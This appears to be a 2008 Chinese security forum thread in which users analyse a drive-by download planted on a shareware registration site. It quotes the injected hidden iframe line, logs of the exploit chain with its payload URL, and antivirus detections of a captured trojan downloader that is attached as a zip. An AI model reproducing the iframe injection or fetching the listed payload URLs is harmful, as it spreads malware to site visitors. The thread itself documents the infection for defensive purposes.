ＲＥＡＬ漏洞利用页．．．

显示全部楼层 · 发表于 2008-2-9 22:02:05

－－－－－－－－－－偶是去国家共享软件注册中心去准备买费尔的．．．．．．．．．．

但是！！！！！！！！

但是！！！！！！！！！！！！！！！

居然给偶碰上了－　－

1.100190.com/d/d.htm

然后－　－

偶查看原代码．．－　－

头顶发现－　－

<iframe src=http://2.lafan8.com/16.htm width=100 height=0></iframe>

．．．．．．．．．还国家共享注册软件中心？？？

安全性这么．．．．．．

速度买费尔．．．打死以后再也不上这个网站

相关测试结果---------感谢冷-冷提供

父级进程：
路径： F:\TT\TTraveler.exe
PID: 3348
信息： Tencent Traveler (Tencent)
子级进程：
路径： D:\WINDOWS\system32\cmd.exe
信息： Windows Command Processor (Microsoft Corporation)
命令行："D:\WINDOWS\system32\cmd.exe" /c D:\WINDOWS\MicroSoft.vbs

父级进程：
路径： F:\TT\TTraveler.exe
PID: 3348
信息： Tencent Traveler (Tencent)
子级进程：
路径： D:\WINDOWS\system32\wscript.exe
信息： Microsoft (r) Windows Based Script Host (Microsoft Corporation)
命令行："D:\WINDOWS\System32\WScript.exe" "I:\Temp\MicroSofts.vbs"

[ 本帖最后由 garyyan456 于 2008-2-9 23:44 编辑 ]

显示全部楼层 · 发表于 2008-2-9 22:06:42

1.100190.com/d/d.htm

这个打不开- -

- -可恶啊,

显示全部楼层 · 发表于 2008-2-9 22:08:30

Log is generated by FreShow.
[wide]http://1.100190.com/d/d.htm
[frame]http://1.100190.com/d/*
[script]http://1.100190.com/d/Ajax.gif
[frame]http://1.100190.com/d/Ms06014.htm
[script]http://1.100190.com/d/Real.js
[script]http://1.100190.com/d/Bfyy.gif
[script]http://1.100190.com/d/Pps.gif
[script]http://1.100190.com/d/XunLei.gif
[script]http://1.100190.com/d/Lz.gif
[frame]http://1.100190.com/d/QVod.html

显示全部楼层 · 发表于 2008-2-9 22:09:13

看来都是老马

显示全部楼层 · 发表于 2008-2-9 22:09:51

3下5/2

Log is generated by FreShow.
[wide]http://2.lafan8.com/16.htm
[frame]http://1.100190.com/d/d.htm
      [script]http://1.100190.com/d/Ajax.gif
      [frame]http://1.100190.com/d/Ms06014.htm
      [script]http://1.100190.com/d/Real.js
         [object]http://1.111281.com/down.exe
      [script]http://1.100190.com/d/Bfyy.gif
      [script]http://1.100190.com/d/Pps.gif
      [script]http://1.100190.com/d/XunLei.gif
      [script]http://1.100190.com/d/Lz.gif
      [frame]http://1.100190.com/d/QVod.html

显示全部楼层 · 发表于 2008-2-9 22:10:11

大多数挂到这个上了

down.zip (43.81 KB, 下载次数: 84)

显示全部楼层 · 发表于 2008-2-9 22:10:50

http://1.111281.com/down.exe
第一次自己弄出来的
截个图

显示全部楼层 · 发表于 2008-2-9 22:10:57

F:\virus\down.zip » ZIP » down.exe - a variant of Win32/TrojanDownloader.Agent.IAJ trojan

显示全部楼层 · 发表于 2008-2-9 22:12:02

McAfee Downloader.gen.a

显示全部楼层 · 发表于 2008-2-9 22:12:09

C:\Documents and Settings\wangcheng\桌面\down.zip » ZIP » down.exe - a variant of Win32/TrojanDownloader.Agent.IAJ trojan

[已鉴定] ＲＥＡＬ漏洞利用页．．．

回复 3楼 Graybird 的帖子

回复 6楼 ykz1991 的帖子